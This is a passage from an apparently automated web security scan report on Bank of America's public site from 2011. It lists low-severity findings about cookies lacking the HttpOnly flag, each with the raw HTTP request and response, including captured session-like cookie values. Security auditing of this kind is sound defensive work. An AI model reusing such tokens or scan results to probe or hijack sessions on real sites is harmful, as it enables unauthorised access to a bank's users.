Set-Cookie: SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; path=/; domain=.bankofamerica.com;
Connection: close
Set-Cookie: BIGipServerngen-www.80=3049633451.20480.0000; path=/


                                                                           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- WR26075 -->


<!-- WR26075 -->


                                       
...[SNIP]...

11.391. http://www.bankofamerica.com/help/spacerimage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/spacerimage

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/spacerimage HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/help/equalhousing_popup.cfm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; CMAVID=none; TCID=0007ae71-9ad3-3b5c-9719-884700000028; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=21; CFID=131550827; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; GEOSERVER=1; BIGipServerngen-www.80=967227051.20480.0000

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:35:46 GMT
Content-type: text/html
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Set-Cookie: BIGipServerngen-www.80=3158750891.20480.0000; path=/
Content-Length: 19150

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Description" content="Plea
...[SNIP]...

11.392. http://www.bankofamerica.com/images/px.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /images/px.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/px.gif HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:39 GMT
Content-length: 43
Content-type: image/gif
Last-modified: Tue, 29 Jul 2003 20:35:06 GMT
Etag: "2b-3f26da7a"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=2705700523.20480.0000; path=/

GIF89a.............!.......,...........D..;

11.393. http://www.bankofamerica.com/images/shared/dot_clear.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /images/shared/dot_clear.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/shared/dot_clear.gif HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:39 GMT
Content-length: 54
Content-type: image/gif
Last-modified: Thu, 07 Jan 1999 15:00:26 GMT
Etag: "36-3694cc0a"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=960935595.20480.0000; path=/

GIF89a.............!.......,...........2.;t_clear.gif

11.394. http://www.bankofamerica.com/insurance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /insurance/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /insurance/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:57 GMT
Content-type: magnus-internal/cold-fusion
Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/insurance/index.cfm?template=overview
Connection: close
Set-Cookie: BIGipServerngen-www.80=3267802795.20480.0000; path=/


11.395. http://www.bankofamerica.com/loansandhomes/financial-difficulty/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /loansandhomes/financial-difficulty/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loansandhomes/financial-difficulty/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:07 GMT
Content-type: magnus-internal/cold-fusion
Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/loansandhomes/financial-difficulty/index.cfm?adlink=&cm_mmc=&cm_sp=&type=
Connection: close
Set-Cookie: BIGipServerngen-www.80=732280491.20480.0000; path=/


11.396. http://www.bankofamerica.com/loansandhomes/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /loansandhomes/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loansandhomes/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:52 GMT
Content-type: magnus-internal/cold-fusion
Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/loansandhomes/index.cfm?template=overview
Connection: close
Set-Cookie: BIGipServerngen-www.80=1606858411.20480.0000; path=/


11.397. http://www.bankofamerica.com/onlinebanking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /onlinebanking

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlinebanking HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:58 GMT
Content-length: 0
Content-type: text/html
Location: http://www.bankofamerica.com/onlinebanking/
Connection: close
Set-Cookie: BIGipServerngen-www.80=1757853355.20480.0000; path=/


11.398. http://www.bankofamerica.com/onlinebanking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /onlinebanking/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlinebanking/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:24 GMT
Content-type: magnus-internal/cold-fusion
Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/onlinebanking/index.cfm?adlink=&cm_mmc=&cm_sp=&context=en_US&locale=
Connection: close
Set-Cookie: BIGipServerngen-www.80=3014047403.20480.0000; path=/


11.399. http://www.bankofamerica.com/onlinebanking/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /onlinebanking/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlinebanking/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:23 GMT
Content-type: magnus-internal/cold-fusion
Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/onlinebanking/index.cfm?adlink=&cm_mmc=&cm_sp=&context=en_US&locale=
Connection: close
Set-Cookie: BIGipServerngen-www.80=3047536299.20480.0000; path=/


11.400. http://www.bankofamerica.com/onlinebanking/infocenter/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /onlinebanking/infocenter/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlinebanking/infocenter/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:22 GMT
Content-type: magnus-internal/cold-fusion
Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/onlinebanking/index.cfm?adlink=&cm_mmc=&cm_sp=&context=en_US&locale=
Connection: close
Set-Cookie: BIGipServerngen-www.80=2714089131.20480.0000; path=/


11.401. http://www.bankofamerica.com/onlineopinionF3cS/oo_conf_en-US.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /onlineopinionF3cS/oo_conf_en-US.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineopinionF3cS/oo_conf_en-US.js HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:38 GMT
Content-length: 1737
Content-type: application/x-javascript
Last-modified: Sat, 28 Jun 2008 02:25:22 GMT
Etag: "6c9-4865a112"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=910603947.20480.0000; path=/

/* OnlineOpinion (F3cS v3.1, en-US) */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
if((typeof _b
...[SNIP]...

11.402. http://www.bankofamerica.com/onlineopinionF3cS/oo_engine.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /onlineopinionF3cS/oo_engine.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineopinionF3cS/oo_engine.js HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:15:11 GMT
Content-length: 6886
Content-type: application/x-javascript
Last-modified: Sat, 28 Jun 2008 10:20:56 GMT
Etag: "1ae6-48661088"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1707521707.20480.0000; path=/

/* OnlineOpinion (F3cS v3.1) */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var custom_var,O_tmof
...[SNIP]...

11.403. http://www.bankofamerica.com/pap/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /pap/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pap/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:01 GMT
Content-type: magnus-internal/cold-fusion
Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/pap/index.cfm?template=overview
Connection: close
Set-Cookie: BIGipServerngen-www.80=430290603.20480.0000; path=/


11.404. http://www.bankofamerica.com/pap/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /pap/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pap/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:59 GMT
Content-type: magnus-internal/cold-fusion
Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/pap/index.cfm?template=overview
Connection: close
Set-Cookie: BIGipServerngen-www.80=3970283179.20480.0000; path=/


11.405. http://www.bankofamerica.com/privacy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /privacy/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:06:00 GMT
Content-type: magnus-internal/cold-fusion
Location: https://www.bankofamerica.com/privacy/Control.do?body=overview
Connection: close
Set-Cookie: BIGipServerngen-www.80=3267737259.20480.0000; path=/


11.406. http://www.bankofamerica.com/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /search/

Issue detail

